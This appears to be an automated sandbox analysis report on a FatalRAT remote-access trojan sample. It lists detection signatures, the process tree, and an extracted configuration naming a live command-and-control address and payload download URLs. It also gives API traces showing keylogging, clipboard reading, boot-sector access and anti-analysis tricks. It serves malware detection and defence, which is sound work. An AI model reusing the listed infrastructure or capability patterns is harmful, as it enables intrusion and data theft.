Play interactive tour

Edit tour

Analysis Report #U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.com

Overview

General Information

Sample Name:	#U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.com (renamed file extension from com to exe)
Analysis ID:	430789
MD5:	d96987f5e2f64b880cfb3a7de05ff0ef
SHA1:	edd15437be63392c7cd332919c332029a2240dd0
SHA256:	2d9002135a5b85b3f3962eab45859f1e59d20ded771b94f0e1127c6c162cb0f4
Tags:	exe
Infos:
Most interesting Screenshot:

Detection

FatalRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected FatalRAT

Changes security center settings (notifications, updates, antivirus, firewall)

Checks if browser processes are running

Contains functionality to access PhysicalDrive, possible boot sector overwrite

Contains functionality to automate explorer (e.g. start an application)

Contains functionality to capture and log keystrokes

Contains functionality to detect virtual machines (IN, VMware)

Contains functionality to determine the online IP of the system

Contains functionality to infect the boot sector

Contains functionality to inject threads in other processes

Creates an undocumented autostart registry key

Drops executables to the windows directory (C:\Windows) and starts them

Machine Learning detection for dropped file

Machine Learning detection for sample

Tries to delay execution (extensive OutputDebugStringW loop)

AV process strings found (often used to terminate AV products)

Antivirus or Machine Learning detection for unpacked file

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to clear windows event logs (to hide its activities)

Contains functionality to communicate with device drivers

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to delete services

Contains functionality to detect virtual machines (SGDT)

Contains functionality to detect virtual machines (SIDT)

Contains functionality to detect virtual machines (SLDT)

Contains functionality to detect virtual machines (STR)

Contains functionality to dynamically determine API calls

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Contains functionality to enumerate running services

Contains functionality to launch a process as a different user

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates files inside the system directory

Creates or modifies windows services

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

Potential key logger detected (key state polling based)

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Tries to load missing DLLs

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

#U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe (PID: 5992 cmdline: 'C:\Users\user\Desktop\#U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe' MD5: D96987F5E2F64B880CFB3A7DE05FF0EF)

Vwxyab.exe (PID: 1488 cmdline: C:\Windows\Vwxyab.exe MD5: D96987F5E2F64B880CFB3A7DE05FF0EF)

Vwxyab.exe (PID: 5028 cmdline: C:\Windows\Vwxyab.exe Win7 MD5: D96987F5E2F64B880CFB3A7DE05FF0EF)

svchost.exe (PID: 1056 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 4580 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 5356 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 4128 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 1536 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 3492 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 5284 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 5580 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 5400 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

SgrmBroker.exe (PID: 4812 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)

svchost.exe (PID: 5944 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

MpCmdRun.exe (PID: 4620 cmdline: 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable MD5: A267555174BFA53844371226F482B86B)

conhost.exe (PID: 4728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: FatalRAT

{"Host": "103.119.44.216", "Port": "8081", "Mutex": "103.119.44.216:8081:Vwxyab Defghijk", "Drop Filename": "Vwxyab", "Service Name": "Vwxyab Defghijk"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
Process Memory Space: Vwxyab.exe PID: 1488	JoeSecurity_FatalRAT	Yara detected FatalRAT	Joe Security
Process Memory Space: Vwxyab.exe PID: 5028	JoeSecurity_FatalRAT	Yara detected FatalRAT	Joe Security

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: Vwxyab.exe.5028.3.memstr

Malware Configuration Extractor: FatalRAT {"Host": "103.119.44.216", "Port": "8081", "Mutex": "103.119.44.216:8081:Vwxyab Defghijk", "Drop Filename": "Vwxyab", "Service Name": "Vwxyab Defghijk"}

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Windows\Vwxyab.exe	Virustotal: Detection: 31%			Perma Link
Source: C:\Windows\Vwxyab.exe	ReversingLabs: Detection: 50%

Multi AV Scanner detection for submitted file

Show sources

Source: #U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe	Virustotal: Detection: 31%			Perma Link
Source: #U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe	ReversingLabs: Detection: 50%

Yara detected FatalRAT

Show sources

Source: Yara match	File source: Process Memory Space: Vwxyab.exe PID: 1488, type: MEMORY
Source: Yara match	File source: Process Memory Space: Vwxyab.exe PID: 5028, type: MEMORY

Machine Learning detection for dropped file

Show sources

Source: C:\Windows\Vwxyab.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Show sources

Source: #U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe

Joe Sandbox ML: detected

Source: 3.2.Vwxyab.exe.10000000.2.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 1.2.Vwxyab.exe.10000000.2.unpack	Avira: Label: BDS/Backdoor.Gen

Source: #U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED

Source: C:\Users\user\Desktop\#U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe	Code function: 0_2_00402490 FindFirstFileA,FindClose,	0_2_00402490
Source: C:\Users\user\Desktop\#U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe	Code function: 0_2_004165BB FindFirstFileA,GetLastError,lstrlenA,SetLastError,__fullpath,__splitpath_s,__makepath_s,	0_2_004165BB
Source: C:\Users\user\Desktop\#U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe	Code function: 0_2_00421296 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,	0_2_00421296
Source: C:\Users\user\Desktop\#U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe	Code function: 0_2_00414D65 lstrlenA,FindFirstFileA,FindClose,	0_2_00414D65
Source: C:\Windows\Vwxyab.exe	Code function: 1_2_00421296 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,	1_2_00421296
Source: C:\Windows\Vwxyab.exe	Code function: 1_2_00402490 FindFirstFileA,FindClose,	1_2_00402490
Source: C:\Windows\Vwxyab.exe	Code function: 1_2_004165BB FindFirstFileA,GetLastError,lstrlenA,SetLastError,__fullpath,__splitpath_s,__makepath_s,	1_2_004165BB
Source: C:\Windows\Vwxyab.exe	Code function: 1_2_00414D65 lstrlenA,FindFirstFileA,FindClose,	1_2_00414D65
Source: C:\Windows\Vwxyab.exe	Code function: 1_2_100060EF __EH_prolog,#535,#539,#5710,#800,#800,#539,#939,#800,#539,#939,#800,FindFirstFileA,FindClose,#800,	1_2_100060EF
Source: C:\Windows\Vwxyab.exe	Code function: 1_2_100022CE __EH_prolog,malloc,GetEnvironmentVariableA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,FindNextFileA,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,	1_2_100022CE
Source: C:\Windows\Vwxyab.exe	Code function: 1_2_10005B32 __EH_prolog,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?at@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@D@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_strcmpi,_strcmpi,_strcmpi,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindNextFileA,FindClose,RemoveDirectoryA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,	1_2_10005B32
Source: C:\Windows\Vwxyab.exe	Code function: 3_2_100060EF __EH_prolog,#535,#539,#5710,#800,#800,#539,#939,#800,#539,#939,#800,FindFirstFileA,FindClose,#800,	3_2_100060EF
Source: C:\Windows\Vwxyab.exe	Code function: 3_2_100022CE __EH_prolog,malloc,GetEnvironmentVariableA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,FindNextFileA,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,	3_2_100022CE
Source: C:\Windows\Vwxyab.exe	Code function: 3_2_10005B32 __EH_prolog,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?at@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@D@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_strcmpi,_strcmpi,_strcmpi,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindNextFileA,FindClose,RemoveDirectoryA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,	3_2_10005B32

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic

Snort IDS: 2033093 ET TROJAN FatalRAT CnC Activity 192.168.2.3:49711 -> 103.119.44.216:8081

Contains functionality to determine the online IP of the system

Show sources

Source: C:\Windows\Vwxyab.exe	Code function: 1_2_1000AD07 InternetOpenA,InternetOpenUrlA,InternetCloseHandle,InternetQueryDataAvailable,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,#823,memset,InternetReadFile,#825,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,strchr,strrchr,inet_addr,#825,#825, http://www.taobao.com/help/getip.php	1_2_1000AD07
Source: C:\Windows\Vwxyab.exe	Code function: 1_2_1000AD07 InternetOpenA,InternetOpenUrlA,InternetCloseHandle,InternetQueryDataAvailable,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,#823,memset,InternetReadFile,#825,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,strchr,strrchr,inet_addr,#825,#825, http://www.taobao.com/help/getip.php	1_2_1000AD07
Source: C:\Windows\Vwxyab.exe	Code function: 3_2_1000AD07 InternetOpenA,InternetOpenUrlA,InternetCloseHandle,InternetQueryDataAvailable,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,#823,memset,InternetReadFile,#825,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,strchr,strrchr,inet_addr,#825,#825, http://www.taobao.com/help/getip.php	3_2_1000AD07
Source: C:\Windows\Vwxyab.exe	Code function: 3_2_1000AD07 InternetOpenA,InternetOpenUrlA,InternetCloseHandle,InternetQueryDataAvailable,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,#823,memset,InternetReadFile,#825,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,strchr,strrchr,inet_addr,#825,#825, http://www.taobao.com/help/getip.php	3_2_1000AD07

Source: global traffic

TCP traffic: 192.168.2.3:49711 -> 103.119.44.216:8081

Source: Joe Sandbox View

ASN Name: LIHGL-AS-AP24hkglobalBGPHK LIHGL-AS-AP24hkglobalBGPHK

Source: unknown	TCP traffic detected without corresponding DNS query: 103.119.44.216
Source: unknown	TCP traffic detected without corresponding DNS query: 103.119.44.216
Source: unknown	TCP traffic detected without corresponding DNS query: 103.119.44.216
Source: unknown	TCP traffic detected without corresponding DNS query: 103.119.44.216
Source: unknown	TCP traffic detected without corresponding DNS query: 103.119.44.216
Source: unknown	TCP traffic detected without corresponding DNS query: 103.119.44.216
Source: unknown	TCP traffic detected without corresponding DNS query: 103.119.44.216
Source: unknown	TCP traffic detected without corresponding DNS query: 103.119.44.216
Source: unknown	TCP traffic detected without corresponding DNS query: 103.119.44.216
Source: unknown	TCP traffic detected without corresponding DNS query: 103.119.44.216
Source: unknown	TCP traffic detected without corresponding DNS query: 103.119.44.216

Source: C:\Windows\Vwxyab.exe

Code function: 1_2_1000183D select,memset,recv,

1_2_1000183D

Source: Vwxyab.exe, 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp, Vwxyab.exe, 00000003.00000003.199399316.00000000022B0000.00000004.00000001.sdmp	String found in binary or memory: http://SVP7.NET:9874/AnyDesk.exe
Source: svchost.exe, 00000007.00000002.466507764.00000200B1016000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: svchost.exe, 00000007.00000002.466507764.00000200B1016000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0:
Source: svchost.exe, 00000007.00000002.466461320.00000200B1000000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.msocsp.com0
Source: svchost.exe, 00000007.00000002.466794376.00000200B1210000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: Vwxyab.exe, 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp, Vwxyab.exe, 00000003.00000003.199399316.00000000022B0000.00000004.00000001.sdmp	String found in binary or memory: http://svp7.net:9874/UltraViewer.exe
Source: svchost.exe, 0000000D.00000002.309041175.0000022B47413000.00000004.00000001.sdmp	String found in binary or memory: http://www.bingmapsportal.com
Source: Vwxyab.exe	String found in binary or memory: http://www.taobao.com/help/getip.php
Source: svchost.exe, 0000000A.00000002.463955404.00000208FA83E000.00000004.00000001.sdmp	String found in binary or memory: https://%s.dnet.xboxlive.com
Source: svchost.exe, 0000000A.00000002.463955404.00000208FA83E000.00000004.00000001.sdmp	String found in binary or memory: https://%s.xboxlive.com
Source: svchost.exe, 0000000A.00000002.463955404.00000208FA83E000.00000004.00000001.sdmp	String found in binary or memory: https://activity.windows.com
Source: svchost.exe, 0000000D.00000003.308666742.0000022B47460000.00000004.00000001.sdmp	String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: svchost.exe, 0000000A.00000002.463955404.00000208FA83E000.00000004.00000001.sdmp	String found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 0000000A.00000002.463955404.00000208FA83E000.00000004.00000001.sdmp	String found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 0000000D.00000003.308698441.0000022B4744B000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 0000000D.00000003.308666742.0000022B47460000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 0000000D.00000002.309081651.0000022B4743E000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 0000000D.00000003.308666742.0000022B47460000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 0000000D.00000003.308679730.0000022B4744E000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 0000000D.00000002.309081651.0000022B4743E000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 0000000D.00000003.308666742.0000022B47460000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 0000000D.00000003.308666742.0000022B47460000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 0000000D.00000003.308666742.0000022B47460000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 0000000D.00000002.309086770.0000022B47442000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 0000000D.00000002.309086770.0000022B47442000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
Source: svchost.exe, 0000000D.00000003.308666742.0000022B47460000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 0000000D.00000002.309090689.0000022B47447000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: svchost.exe, 0000000D.00000003.308698441.0000022B4744B000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 0000000D.00000002.309090689.0000022B47447000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 0000000D.00000002.309090689.0000022B47447000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 0000000D.00000003.308679730.0000022B4744E000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.t
Source: svchost.exe, 0000000D.00000003.308666742.0000022B47460000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 0000000D.00000002.309081651.0000022B4743E000.00000004.00000001.sdmp	String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 0000000D.00000003.287002628.0000022B47432000.00000004.00000001.sdmp	String found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 0000000D.00000002.309081651.0000022B4743E000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 0000000D.00000002.309041175.0000022B47413000.00000004.00000001.sdmp, svchost.exe, 0000000D.00000002.309081651.0000022B4743E000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 0000000D.00000003.308723240.0000022B47445000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 0000000D.00000003.308723240.0000022B47445000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
Source: svchost.exe, 0000000D.00000003.287002628.0000022B47432000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 0000000D.00000002.309067392.0000022B4743B000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 0000000D.00000003.308679730.0000022B4744E000.00000004.00000001.sdmp	String found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to capture and log keystrokes

Show sources

Source: C:\Windows\Vwxyab.exe	Code function: <BackSpace>	1_2_10004247
Source: C:\Windows\Vwxyab.exe	Code function: <Enter>	1_2_10004247
Source: C:\Windows\Vwxyab.exe	Code function: <BackSpace>	3_2_10004247
Source: C:\Windows\Vwxyab.exe	Code function: <Enter>	3_2_10004247

Source: C:\Windows\Vwxyab.exe

Code function: 1_2_1000132F OpenClipboard,GetClipboardData,GlobalFix,strlen,strlen,GlobalUnWire,CloseClipboard,

1_2_1000132F

Source: C:\Windows\Vwxyab.exe

Code function: 1_2_1000132F OpenClipboard,GetClipboardData,GlobalFix,strlen,strlen,GlobalUnWire,CloseClipboard,

1_2_1000132F

Source: C:\Windows\Vwxyab.exe

Code function: 1_2_10004247 memset,Sleep,lstrlenA,memset,memset,GetKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,lstrlenA,lstrcatA,memset,lstrcatA,

1_2_10004247

Source: C:\Users\user\Desktop\#U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe	Code function: 0_2_0041123F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,		0_2_0041123F
Source: C:\Windows\Vwxyab.exe	Code function: 1_2_0041123F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,		1_2_0041123F

E-Banking Fraud:

Yara detected FatalRAT

Show sources

Source: Yara match	File source: Process Memory Space: Vwxyab.exe PID: 1488, type: MEMORY
Source: Yara match	File source: Process Memory Space: Vwxyab.exe PID: 5028, type: MEMORY

Checks if browser processes are running

Show sources

Source: C:\Windows\Vwxyab.exe	Code function: strlen,memset,lstrlenA,strstr,lstrcpyA,CreateProcessA, Applications\iexplore.exe\shell\open\command		1_2_10005400
Source: C:\Windows\Vwxyab.exe	Code function: strlen,memset,lstrlenA,strstr,lstrcpyA,CreateProcessA, Applications\iexplore.exe\shell\open\command		3_2_10005400

Operating System Destruction:

Contains functionality to access PhysicalDrive, possible boot sector overwrite

Show sources

Source: C:\Windows\Vwxyab.exe	Code function: 1_2_1000213F CreateFileA on filename \\.\PhysicalDrive0	1_2_1000213F
Source: C:\Windows\Vwxyab.exe	Code function: 1_2_100077D3 CreateFileA on filename \\.\PHYSICALDRIVE0	1_2_100077D3
Source: C:\Windows\Vwxyab.exe	Code function: 3_2_1000213F CreateFileA on filename \\.\PhysicalDrive0	3_2_1000213F
Source: C:\Windows\Vwxyab.exe	Code function: 3_2_100077D3 CreateFileA on filename \\.\PHYSICALDRIVE0	3_2_100077D3

Source: C:\Windows\Vwxyab.exe

Code function: 1_2_1000213F: CreateFileA,CloseHandle,DeviceIoControl,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,

1_2_1000213F

Source: C:\Windows\Vwxyab.exe

Code function: 1_2_100032B8 lstrlenA,OpenSCManagerA,OpenServiceA,DeleteService,CloseServiceHandle,CloseServiceHandle,

1_2_100032B8

Source: C:\Windows\Vwxyab.exe

Code function: 1_2_10003333 LoadLibraryA,GetProcAddress,memset,memset,GetCurrentProcess,OpenProcessToken,DuplicateTokenEx,WTSGetActiveConsoleSessionId,SetTokenInformation,CreateProcessAsUserA,CloseHandle,CloseHandle,FreeLibrary,

1_2_10003333

Source: C:\Windows\Vwxyab.exe	Code function: 1_2_10004627 ExitWindowsEx,	1_2_10004627
Source: C:\Windows\Vwxyab.exe	Code function: 1_2_100077D3 memcpy,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle,Sleep,GetVersion,ExitWindowsEx,ExitProcess,	1_2_100077D3
Source: C:\Windows\Vwxyab.exe	Code function: 3_2_10004627 ExitWindowsEx,	3_2_10004627
Source: C:\Windows\Vwxyab.exe	Code function: 3_2_100077D3 memcpy,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle,Sleep,GetVersion,ExitWindowsEx,ExitProcess,	3_2_100077D3

Source: C:\Users\user\Desktop\#U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe

File created: C:\Windows\Vwxyab.exe

Jump to behavior

Source: C:\Users\user\Desktop\#U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe	Code function: 0_2_0043704E	0_2_0043704E
Source: C:\Users\user\Desktop\#U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe	Code function: 0_2_00429010	0_2_00429010
Source: C:\Users\user\Desktop\#U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe	Code function: 0_2_00431024	0_2_00431024
Source: C:\Users\user\Desktop\#U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe	Code function: 0_2_004281D2	0_2_004281D2
Source: C:\Users\user\Desktop\#U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe	Code function: 0_2_004074B0	0_2_004074B0
Source: C:\Users\user\Desktop\#U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe	Code function: 0_2_004365CA	0_2_004365CA
Source: C:\Users\user\Desktop\#U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe	Code function: 0_2_004285DE	0_2_004285DE
Source: C:\Users\user\Desktop\#U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe	Code function: 0_2_004046E0	0_2_004046E0
Source: C:\Users\user\Desktop\#U6700#U65b0#U9ed1#U9a6c#U80a1#U5e02#U6599.exe	Code function: 0_2_00437712	0_2_00437712
